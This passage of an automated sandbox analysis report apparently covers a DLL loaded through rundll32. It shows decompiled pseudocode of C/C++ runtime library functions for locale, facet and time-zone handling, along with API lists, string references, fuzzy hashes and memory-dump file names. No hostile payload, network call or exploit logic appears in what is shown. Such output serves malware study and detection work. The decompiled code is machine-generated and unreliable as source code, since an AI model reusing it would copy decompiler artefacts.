							E6E206FD3(__eflags, _t799);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t799 + 4))))();
							 *0x6e2c6dd4 = _t799;
							goto L5;
						}
					} else {
						_t799 = _t819;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E20F0E4
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F0EE
int.LIBCPMT ref: 6E20F105

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

ctype.LIBCPMT ref: 6E20F128
std::_Facet_Register.LIBCPMT ref: 6E20F13F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F15F
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F17D

Strings

(k,n, xrefs: 6E20F0F9

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: (k,n
API String ID: 1394824916-2474335229
Opcode ID: cc28697564a2c7203ff979a8fb5b774c98dc29d3b58340312fcd4848b9827f16
Instruction ID: 0c45d773f348144a53aee096c385ca3720259a60b4694af22e905baab13ee6b9
Opcode Fuzzy Hash: cc28697564a2c7203ff979a8fb5b774c98dc29d3b58340312fcd4848b9827f16
Instruction Fuzzy Hash: 7011C67591052DDBCF01EBE4C894AEEB7BBAF45B15F240908E510AB3D0DB749A44C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E204A80, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 51
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E6E204A80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t57;
				intOrPtr* _t60;
				void* _t61;

				_t44 = __ebx;
				E6E2200AC(0x6e268144, __ebx, __edi, __esi, 0x14);
				E6E206653(_t61 - 0x14, 0);
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				_t57 =  *0x6e2dce80; // 0x712230
				 *((intOrPtr*)(_t61 - 0x10)) = _t57;
				_t23 = E6E1E161C(0x6e2c6b34);
				_t47 =  *((intOrPtr*)(_t61 + 8));
				_t24 = E6E1E171B( *((intOrPtr*)(_t61 + 8)), _t23);
				_t59 = _t24;
				if(_t24 != 0) {
					L5:
					E6E2066BA(_t61 - 0x14);
					return E6E220075(_t59);
				} else {
					if(_t57 == 0) {
						_push( *((intOrPtr*)(_t61 + 8)));
						_push(_t61 - 0x10);
						__eflags = E6E1E18A0(__ebx, _t47, __edx, _t57, _t59) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t61 - 0x20);
							E6E223D74(_t61 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e268192, __ebx, _t57, _t59, 0xc);
							_t60 = E6E204A32(_t44, _t57, _t59, 8);
							 *((intOrPtr*)(_t61 - 0x18)) = _t61 - 0xd;
							 *((intOrPtr*)(_t61 - 0x14)) = _t60;
							__eflags = 0;
							 *(_t61 - 4) = 0;
							 *_t60 = 0;
							 *((intOrPtr*)(_t60 + 4)) = 0;
							 *_t60 = E6E205BFB();
							return E6E220075(_t60);
						} else {
							_t59 =  *((intOrPtr*)(_t61 - 0x10));
							 *((intOrPtr*)(_t61 - 0x10)) = _t59;
							 *(_t61 - 4) = 1;
							E6E206FD3(__eflags, _t59);
							 *((intOrPtr*)( *_t59 + 4))();
							 *0x6e2dce80 = _t59;
							goto L5;
						}
					} else {
						_t59 = _t57;
						goto L5;
					}
				}
			}

0x6e204a80
0x6e204a87
0x6e204a91
0x6e204a96
0x6e204a9f
0x6e204aa5
0x6e204aa8
0x6e204aad
0x6e204ab1
0x6e204ab6
0x6e204aba
0x6e204af5
0x6e204af8
0x6e204b04
0x6e204abc
0x6e204abe
0x6e204ac4
0x6e204aca
0x6e204ad2
0x6e204ad5
0x6e204b08
0x6e204b16
0x6e204b1b
0x6e204b23
0x6e204b2f
0x6e204b35
0x6e204b38
0x6e204b3b
0x6e204b3d
0x6e204b40
0x6e204b42
0x6e204b4a
0x6e204b53
0x6e204ad7
0x6e204ad7
0x6e204ada
0x6e204ade
0x6e204ae2
0x6e204aec
0x6e204aef
0x00000000
0x6e204aef
0x6e204ac0
0x6e204ac0
0x00000000
0x6e204ac0
0x6e204abe

APIs

__EH_prolog3.LIBCMT ref: 6E204A87
std::_Lockit::_Lockit.LIBCPMT ref: 6E204A91
int.LIBCPMT ref: 6E204AA8

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E204AE2
std::_Lockit::~_Lockit.LIBCPMT ref: 6E204AF8
__CxxThrowException@8.LIBVCRUNTIME ref: 6E204B16

Strings

0"q, xrefs: 6E204A9F, 6E204AEF
4k,n, xrefs: 6E204A9A

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: 0"q$4k,n
API String ID: 651022567-3825377223
Opcode ID: fd993dd31e729741fb0ed1f16ed0c38dafbb1994221349c2cae0aa3e911a7adf
Instruction ID: 00ec10d4d1f6f95a13ce8117a06ad8c9da69bf17027057e75645471f1ee739ee
Opcode Fuzzy Hash: fd993dd31e729741fb0ed1f16ed0c38dafbb1994221349c2cae0aa3e911a7adf
Instruction Fuzzy Hash: 0011E176E0052E9BCF00DBE0C894AEDB77BBF54715F144A18E510AB2D0DBB49A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E24E984, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 274
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E6E24E984(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t151;
				void* _t158;
				signed int _t159;
				signed int _t160;
				intOrPtr _t161;
				signed int _t164;
				signed int _t168;
				signed int _t169;
				intOrPtr* _t171;
				intOrPtr _t172;
				signed int _t175;
				signed int _t176;
				signed int _t178;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t210;
				signed int _t216;
				intOrPtr* _t217;
				signed int _t230;
				signed int _t233;
				intOrPtr* _t234;
				signed int _t236;
				signed int* _t240;
				intOrPtr _t249;
				signed int _t254;
				signed int _t256;
				void* _t257;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				short _t263;
				signed int _t265;
				signed int _t267;
				void* _t269;
				void* _t271;

				_t265 = _t267;
				_t151 =  *0x6e2c506c; // 0x2b33ced3
				_v8 = _t151 ^ _t265;
				_push(__ebx);
				_t210 = _a8;
				_push(__esi);
				_push(__edi);
				_t249 = _a4;
				_v744 = _t210;
				_v728 = E6E24D5FF(_t210, __ecx, __edx) + 0x278;
				_t158 = E6E24DE92(_t210, __edx, _t249, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v708);
				_t269 = _t267 - 0x2e4 + 0x18;
				if(_t158 != 0) {
					_t11 = _t210 + 2; // 0x6
					_t254 = _t11 << 4;
					__eflags = _t254;
					_t159 =  &_v272;
					_v716 = _t254;
					_t247 =  *(_t254 + _t249);
					_t216 =  *(_t254 + _t249);
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t159 -  *_t216;
						_t256 = _v716;
						if( *_t159 !=  *_t216) {
							break;
						}
						__eflags =  *_t159;
						if( *_t159 == 0) {
							L9:
							_t160 = _v704;
						} else {
							_t263 =  *((intOrPtr*)(_t159 + 2));
							__eflags = _t263 -  *((intOrPtr*)(_t216 + 2));
							_v710 = _t263;
							_t256 = _v716;
							if(_t263 !=  *((intOrPtr*)(_t216 + 2))) {
								break;
							} else {
								_t159 = _t159 + 4;
								_t216 = _t216 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L9;
								}
							}
						}
						L11:
						__eflags = _t160;
						if(_t160 != 0) {
							_t217 =  &_v272;
							_t247 = _t217 + 2;
							do {
								_t161 =  *_t217;
								_t217 = _t217 + 2;
								__eflags = _t161 - _v704;
							} while (_t161 != _v704);
							_v720 = (_t217 - _t247 >> 1) + 1;
							_t164 = E6E24F26D(_t217 - _t247 >> 1, 4 + ((_t217 - _t247 >> 1) + 1) * 2);
							_v732 = _t164;
							__eflags = _t164;
							if(_t164 == 0) {
								goto L2;
							} else {
								_v724 =  *((intOrPtr*)(_t256 + _t249));
								_t35 = _t210 * 4; // 0xe764e850
								_v736 =  *((intOrPtr*)(_t249 + _t35 + 0xa0));
								_t38 = _t249 + 8; // 0x8b018b
								_v740 =  *_t38;
								_t226 =  &_v272;
								_v712 = _t164 + 4;
								_t168 = E6E2491A7(_t164 + 4, _v720,  &_v272);
								_t271 = _t269 + 0xc;
								__eflags = _t168;
								if(_t168 != 0) {
									_t169 = _v704;
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									E6E242188();
									asm("int3");
									_t171 =  *0x6e2c76f0; // 0x7247a8
									 *0x6e2c5108 =  *((intOrPtr*)(_t171 + 0x88));
									 *0x6e2c51c0 =  *_t171;
									_t172 =  *((intOrPtr*)(_t171 + 4));
									 *0x6e2c51ec = _t172;
									return _t172;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t256 + _t249)) = _v712;
									if(_v272 != 0x43) {
										L20:
										_t175 = E6E24DB3B(_t210, _t226, _t249,  &_v700);
										_t230 = _v704;
										 *(_t249 + 0xa0 + _t210 * 4) = _t175;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L20;
										} else {
											_t230 = _v704;
											 *(_t249 + 0xa0 + _t210 * 4) = _t230;
										}
									}
									__eflags = _t210 - 2;
									if(_t210 != 2) {
										__eflags = _t210 - 1;
										if(_t210 != 1) {
											__eflags = _t210 - 5;
											if(_t210 == 5) {
												 *((intOrPtr*)(_t249 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t249 + 0x10)) = _v708;
										}
									} else {
										_t261 = _v728;
										_t247 = _t230;
										_t240 = _t261;
										 *(_t249 + 8) = _v708;
										_v712 = _t261;
										_v720 = _t261[8];
										_v708 = _t261[9];
										while(1) {
											_t64 = _t249 + 8; // 0x8b018b
											__eflags =  *_t64 -  *_t240;
											if( *_t64 ==  *_t240) {
												break;
											}
											_t262 = _v712;
											_t247 = _t247 + 1;
											_t207 =  *_t240;
											 *_t262 = _v720;
											_v708 = _t240[1];
											_t240 = _t262 + 8;
											 *((intOrPtr*)(_t262 + 4)) = _v708;
											_t210 = _v744;
											_t261 = _v728;
											_v720 = _t207;
											_v712 = _t240;
											__eflags = _t247 - 5;
											if(_t247 < 5) {
												continue;
											} else {
											}
											L28:
											__eflags = _t247 - 5;
											if(__eflags == 0) {
												_t88 = _t249 + 8; // 0x8b018b
												_t198 = E6E256102(_t210, _t247, _t249, __eflags, _v704, 1, 0x6e270ea8, 0x7f,  &_v528,  *_t88, 1);
												_t271 = _t271 + 0x1c;
												__eflags = _t198;
												_t199 = _v704;
												if(_t198 == 0) {
													_t261[1] = _t199;
												} else {
													do {
														 *(_t265 + _t199 * 2 - 0x20c) =  *(_t265 + _t199 * 2 - 0x20c) & 0x000001ff;
														_t199 = _t199 + 1;
														__eflags = _t199 - 0x7f;
													} while (_t199 < 0x7f);
													_t202 = E6E221C3C( &_v528,  *0x6e2c51e8, 0xfe);
													_t271 = _t271 + 0xc;
													__eflags = _t202;
													_t261[1] = 0 | _t202 == 0x00000000;
												}
												_t103 = _t249 + 8; // 0x8b018b
												 *_t261 =  *_t103;
											}
											 *(_t249 + 0x18) = _t261[1];
											goto L39;
										}
										__eflags = _t247;
										if(_t247 != 0) {
											 *_t261 =  *(_t261 + _t247 * 8);
											_t261[1] =  *(_t261 + 4 + _t247 * 8);
											 *(_t261 + _t247 * 8) = _v720;
											 *(_t261 + 4 + _t247 * 8) = _v708;
										}
										goto L28;
									}
									L39:
									_t176 = _t210 * 0xc;
									_t110 = _t176 + 0x6e270de8; // 0x6e20815c
									 *0x6e26a26c(_t249);
									_t178 =  *((intOrPtr*)( *_t110))();
									_t233 = _v724;
									__eflags = _t178;
									if(_t178 == 0) {
										__eflags = _t233 - 0x6e2c52b0;
										if(_t233 != 0x6e2c52b0) {
											_t260 = _t210 + _t210;
											__eflags = _t260;
											asm("lock xadd [eax], ecx");
											if(_t260 != 0) {
												goto L44;
											} else {
												_t128 = _t260 * 8; // 0x10468b00
												E6E24CBD3( *((intOrPtr*)(_t249 + _t128 + 0x28)));
												_t131 = _t260 * 8; // 0x3b8e8
												E6E24CBD3( *((intOrPtr*)(_t249 + _t131 + 0x24)));
												_t134 = _t210 * 4; // 0xe764e850
												E6E24CBD3( *((intOrPtr*)(_t249 + _t134 + 0xa0)));
												_t236 = _v704;
												 *((intOrPtr*)(_v716 + _t249)) = _t236;
												 *(_t249 + 0xa0 + _t210 * 4) = _t236;
											}
										}
										_t234 = _v732;
										 *_t234 = 1;
										 *((intOrPtr*)(_t249 + 0x28 + (_t210 + _t210) * 8)) = _t234;
									} else {
										 *(_v716 + _t249) = _t233;
										_t115 = _t210 * 4; // 0xe764e850
										E6E24CBD3( *((intOrPtr*)(_t249 + _t115 + 0xa0)));
										 *(_t249 + 0xa0 + _t210 * 4) = _v736;
										E6E24CBD3(_v732);
										 *(_t249 + 8) = _v740;
										goto L2;
									}
									goto L3;
								}
							}
						} else {
							goto L3;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t160 = _t159 | 0x00000001;
					__eflags = _t160;
					goto L11;
				} else {
					L2:
					L3:
					_pop(_t257);
					return E6E21F8A5(_v8 ^ _t265, _t247, _t257);
				}
				L47:
			}

0x6e24e987
0x6e24e98f
0x6e24e996
0x6e24e999
0x6e24e99a
0x6e24e99d
0x6e24e9a1
0x6e24e9a2
0x6e24e9a5
0x6e24e9b5
0x6e24e9d8
0x6e24e9dd
0x6e24e9e2
0x6e24e9f7
0x6e24e9fa
0x6e24e9fa
0x6e24e9fd
0x6e24ea03
0x6e24ea09
0x6e24ea0c
0x6e24ea0e
0x6e24ea11
0x6e24ea18
0x6e24ea1b
0x6e24ea21
0x00000000
0x00000000
0x6e24ea23
0x6e24ea27
0x6e24ea50
0x6e24ea50
0x6e24ea29
0x6e24ea29
0x6e24ea2d
0x6e24ea31
0x6e24ea38
0x6e24ea3e
0x00000000
0x6e24ea40
0x6e24ea40
0x6e24ea43
0x6e24ea46
0x6e24ea4e
0x00000000
0x00000000
0x00000000
0x00000000
0x6e24ea4e
0x6e24ea3e
0x6e24ea5d
0x6e24ea5d
0x6e24ea5f
0x6e24ea65
0x6e24ea6b
0x6e24ea6e
0x6e24ea6e
0x6e24ea71
0x6e24ea74
0x6e24ea74
0x6e24ea84
0x6e24ea92
0x6e24ea97
0x6e24ea9e
0x6e24eaa0
0x00000000
0x6e24eaa6
0x6e24eaac
0x6e24eab2
0x6e24eab9
0x6e24eabf
0x6e24eac2
0x6e24eac8
0x6e24ead5
0x6e24eadc
0x6e24eae1
0x6e24eae4
0x6e24eae6
0x6e24ed3f
0x6e24ed45
0x6e24ed46
0x6e24ed47
0x6e24ed48
0x6e24ed49
0x6e24ed4a
0x6e24ed4f
0x6e24ed50
0x6e24ed5b
0x6e24ed63
0x6e24ed69
0x6e24ed6c
0x6e24ed71
0x6e24eaec
0x6e24eaec
0x6e24eafa
0x6e24eafd
0x6e24eb18
0x6e24eb1f
0x6e24eb25
0x6e24eb2b
0x6e24eaff
0x6e24eaff
0x6e24eb07
0x00000000
0x6e24eb09
0x6e24eb09
0x6e24eb0f
0x6e24eb0f
0x6e24eb07
0x6e24eb32
0x6e24eb35
0x6e24ec52
0x6e24ec55
0x6e24ec62
0x6e24ec65
0x6e24ec6d
0x6e24ec6d
0x6e24ec57
0x6e24ec5d
0x6e24ec5d
0x6e24eb3b
0x6e24eb3b
0x6e24eb41
0x6e24eb49
0x6e24eb4b
0x6e24eb4e
0x6e24eb57
0x6e24eb60
0x6e24eb66
0x6e24eb66
0x6e24eb69
0x6e24eb6b
0x00000000
0x00000000
0x6e24eb6d
0x6e24eb73
0x6e24eb74
0x6e24eb7f
0x6e24eb87
0x6e24eb8f
0x6e24eb92
0x6e24eb95
0x6e24eb9b
0x6e24eba1
0x6e24eba7
0x6e24ebad
0x6e24ebb0
0x00000000
0x00000000
0x6e24ebb2
0x6e24ebd7
0x6e24ebd7
0x6e24ebda
0x6e24ebde
0x6e24ebf7
0x6e24ebfc
0x6e24ebff
0x6e24ec01
0x6e24ec07
0x6e24ec42
0x6e24ec09
0x6e24ec09
0x6e24ec0e
0x6e24ec16
0x6e24ec17
0x6e24ec17
0x6e24ec2e
0x6e24ec35
0x6e24ec38
0x6e24ec3d
0x6e24ec3d
0x6e24ec45
0x6e24ec48
0x6e24ec48
0x6e24ec4d
0x00000000
0x6e24ec4d
0x6e24ebb4
0x6e24ebb6
0x6e24ebbb
0x6e24ebc1
0x6e24ebca
0x6e24ebd3
0x6e24ebd3
0x00000000
0x6e24ebb6
0x6e24ec70
0x6e24ec70
0x6e24ec74
0x6e24ec7c
0x6e24ec82
0x6e24ec85
0x6e24ec8b
0x6e24ec8d
0x6e24eccd
0x6e24ecd3
0x6e24ecda
0x6e24ecda
0x6e24ece0
0x6e24ece4
0x00000000
0x6e24ece6
0x6e24ece6
0x6e24ecea
0x6e24ecef
0x6e24ecf3
0x6e24ecf8
0x6e24ecff
0x6e24ed0d
0x6e24ed13
0x6e24ed16
0x6e24ed16
0x6e24ece4
0x6e24ed25
0x6e24ed2d
0x6e24ed36
0x6e24ec8f
0x6e24ec95
0x6e24ec98
0x6e24ec9f
0x6e24ecb1
0x6e24ecb8
0x6e24ecc5
0x00000000
0x6e24ecc5
0x00000000
0x6e24ec8d
0x6e24eae6
0x6e24ea61
0x00000000
0x6e24ea61
0x00000000
0x6e24ea5f
0x6e24ea58
0x6e24ea5a
0x6e24ea5a
0x00000000
0x6e24e9e4
0x6e24e9e4
0x6e24e9e6
0x6e24e9ea
0x6e24e9f6
0x6e24e9f6
0x00000000

APIs

Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,924FAE9A), ref: 6E24D603
Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,924FAE9A), ref: 6E24D677
Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D

_memcmp.LIBVCRUNTIME ref: 6E24EC2E
_free.LIBCMT ref: 6E24EC9F
_free.LIBCMT ref: 6E24ECB8
_free.LIBCMT ref: 6E24ECEA
_free.LIBCMT ref: 6E24ECF3
_free.LIBCMT ref: 6E24ECFF

Strings

C, xrefs: 6E24EAEC

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 6a6fa75c753b15ece908a815969655c54366d2d8d26146940af82ee3fc049b99
Instruction ID: b1b15a0b1200166e04248ea529bcf5a4c7a177af09dd3a0eb513ee286b4b1cfc
Opcode Fuzzy Hash: 6a6fa75c753b15ece908a815969655c54366d2d8d26146940af82ee3fc049b99
Instruction Fuzzy Hash: 56C15D7590121EDFEB68DF58C888A9DB7B6FF49704F1045AAD94AAB350D731AE80CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E258951, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171
timeCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 71%

			E6E258951(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __esi;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				void* _t87;
				signed int _t88;
				signed int _t90;
				int _t94;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t89 = __edi;
				_t96 = E6E25822B();
				_t1 =  &_v8; // 0x6e272130
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E6E258289(_t1);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E242188();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x6e2c506c; // 0x2b33ced3
					_v56 = _t38 ^ _t106;
					 *0x6e2c5384 =  *0x6e2c5384 | 0xffffffff;
					 *0x6e2c5378 =  *0x6e2c5378 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t90 = 0;
					 *0x6e2c7a10 = 0;
					_t42 = E6E251216(0x6e272130, _t87, 0, __eflags,  &_v316,  &_v312, 0x100, 0x6e272130);
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E6E24F26D(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E6E251216(0x6e272130, _t87, 0, __eflags,  &_v276, _t101, _v272, 0x6e272130);
								__eflags = _t50;
								if(_t50 == 0) {
									E6E24CBD3(0);
									_t90 = _t101;
								} else {
									_push(_t101);
									goto L26;
								}
							} else {
								_push(0);
								L26:
								E6E24CBD3();
							}
						}
					} else {
						_t90 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t90 -  &_v268) & _t90;
					__eflags = _t90;
					if(__eflags == 0) {
						L34:
						E6E258951(0x6e272130, _t90, __eflags);
					} else {
						__eflags =  *_t90;
						if(__eflags == 0) {
							goto L34;
						} else {
							_push(_t90);
							E6E25877C(0x6e272130, _t90, __eflags);
						}
					}
					E6E24CBD3(_t100);
					__eflags = _v12 ^ _t106;
					return E6E21F8A5(_v12 ^ _t106, _t87, _t100);
				} else {
					_t54 = E6E258231( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E6E25825D( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E6E24CBD3( *0x6e2c7a08);
							 *0x6e2c7a08 = 0;
							 *_t107 = 0x6e2c7a18;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x6e2c7a18 * 0x3c;
								_t88 =  *0x6e2c7a6c; // 0x0
								_push(__edi);
								 *0x6e2c7a10 = 1;
								_v8 = _t85;
								_t116 =  *0x6e2c7a5e; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t88 * 0x3c;
								}
								_t118 =  *0x6e2c7ab2; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x6e2c7ac0; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t88) * 0x3c;
									}
								}
								_t94 = E6E243CD0(0, _t88);
								if(WideCharToMultiByte(_t94, 0, 0x6e2c7a1c, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t94, 0, 0x6e2c7a70, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E6E258225()) = _v8;
							 *(E6E258219()) = _v12;
							_t61 = E6E25821F();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}

0x6e258951
0x6e258960
0x6e258964
0x6e258967
0x6e25896b
0x6e25896e
0x6e258971
0x6e258976
0x6e258979
0x6e258aa1
0x6e258aa1
0x6e258aa2
0x6e258aa3
0x6e258aa4
0x6e258aa5
0x6e258aa6
0x6e258aab
0x6e258aaf
0x6e258ab7
0x6e258abe
0x6e258ac1
0x6e258ace
0x6e258ad5
0x6e258ad6
0x6e258add
0x6e258aec
0x6e258af3
0x6e258afb
0x6e258afd
0x6e258b07
0x6e258b0a
0x6e258b17
0x6e258b1a
0x6e258b1c
0x6e258b35
0x6e258b3d
0x6e258b3f
0x6e258b45
0x6e258b4a
0x6e258b41
0x6e258b41
0x00000000
0x6e258b41
0x6e258b1e
0x6e258b1e
0x6e258b1f
0x6e258b1f
0x6e258b1f
0x6e258b4c
0x6e258aff
0x6e258aff
0x6e258aff
0x6e258b59
0x6e258b5b
0x6e258b5d
0x6e258b5f
0x6e258b6f
0x6e258b6f
0x6e258b61
0x6e258b61
0x6e258b64
0x00000000
0x6e258b66
0x6e258b66
0x6e258b67
0x6e258b6c
0x6e258b64
0x6e258b75
0x6e258b80
0x6e258b8b
0x6e25897f
0x6e258983
0x6e258988
0x6e25898b
0x00000000
0x6e258991
0x6e258995
0x6e25899a
0x6e25899d
0x00000000
0x6e2589a3
0x6e2589a9
0x6e2589ae
0x6e2589b4
0x6e2589c4
0x6e2589ca
0x6e2589d1
0x6e2589d7
0x6e2589db
0x6e2589e1
0x6e2589e4
0x6e2589eb
0x6e2589f2
0x6e2589f2
0x6e2589f5
0x6e2589fc
0x6e258a14
0x6e258a14
0x6e258a17
0x6e2589fe
0x6e2589fe
0x6e258a05
0x00000000
0x6e258a07
0x6e258a09
0x6e258a0f
0x6e258a0f
0x6e258a05
0x6e258a1f
0x6e258a3b
0x6e258a4b
0x6e258a42
0x6e258a44
0x6e258a44
0x6e258a69
0x6e258a7b
0x6e258a70
0x6e258a73
0x6e258a73
0x6e258a69
0x6e258a85
0x6e258a8f
0x6e258a94
0x6e258a99
0x6e258aa0
0x6e258aa0
0x6e25899d
0x6e25898b

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E272130), ref: 6E2589BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E258A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A70,000000FF,?,0000003F,00000000,?), ref: 6E258A60
_free.LIBCMT ref: 6E2589A9

Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB

_free.LIBCMT ref: 6E258B75

Strings

0!'n, xrefs: 6E258964, 6E25896A
0!'n, xrefs: 6E258AD8

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
